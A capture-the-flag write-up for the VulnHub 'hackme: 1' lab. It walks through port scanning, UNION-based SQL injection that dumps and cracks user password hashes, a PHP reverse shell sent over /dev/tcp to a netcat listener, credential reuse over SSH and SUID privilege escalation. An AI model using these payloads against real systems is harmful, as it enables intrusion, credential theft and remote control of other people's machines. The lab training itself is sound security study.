VulnHub: hackme: 1

5 min readApr 23, 2021

Initial Foothold

  1. Network discovery
nmap -sn

My target is

2. TCP Portscan

nmap -Pn -Pn -p1000-

There’re 2 services: ssh and http

3. UDP scan

nmap -sU -sV

4. OS and service scan

nmap -A -p22,80

5. Vuln scan

nmap --script vuln -p22,80

There’re HTTP pages the I can access.

Service Enumeration

  • SSH


  • HTTP
  1. nikto scan
nikto -h

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

3. Access site

There’s a username and password requirement and I also can sign up.

View page source

Access /uploads/


Register new user

Log in

There’s a search function and 3 columns. My guess is search function calls SQL query.


  1. Test for SQL injection
1' or 1=1--

No data

Try another test query

1' or 1=1-- - 

Succeeded. Next to continue to inject query to retrieve some data.

There’re 3 columns, my guess is I’ll union w/ 1,2,3. No need to test for column numbers like this:

1' union select 1-- -1' union select 1,2-- -

So my query is:

1' union select 1,2,3-- -

As predicted, there’re 3 columns needed for this query.

Retrieve trivial data

1' union select @@version,@@hostname,database()-- -

The host version is 5.7.25–0ubuntu0.18.10.2.

The hostname is hackme.

Database is webapphacking.

Get table name

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -

I have 2 tables: books and users.

Table: users is interesting. I will find its columns.

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()-- -

I have 5 columns: id, user, password, name, and address.

I need 3 columns: id, user, and password.

1' union select 1,group_concat(id,':',user,':',pasword),3 from users-- -

Copy it and organize w/ editor for easier viewing.

My intersintes is ‘superadmin’

Copy the hash and crack w/ crackstation. Now I have the password.

Login as superadmin.

I can upload files. I’ll try to upload reverse shell.

Prepare a reverse shell PHP script.

exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");

Prepare listener

rlwrap nc -lvp 443

Upload the file

Access it via /uploads/, click the file.

Back to the listener, now I got the connection.

Test it


Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Privilege Escalation

  1. Explore directory
cd /var/www/htmlcat config.php

I got MySQL root’s credential.

Try to re-use it via SSH service.

ssh hackme1qaz@WSX


cd /home/legacyls -la

I found this ‘touchmenot’ file.

Let’s try to run it


Now I’m root.

The reason behind running it and get root shell immediately is SUID. Normally, you have to verify for SUID w/ this command

find / -perm -u=s -type f 2>/dev/null

From the result, you can continue the escalation process. This time, I’m just lucky w/ directory enumeration process and save a lot of time finding it.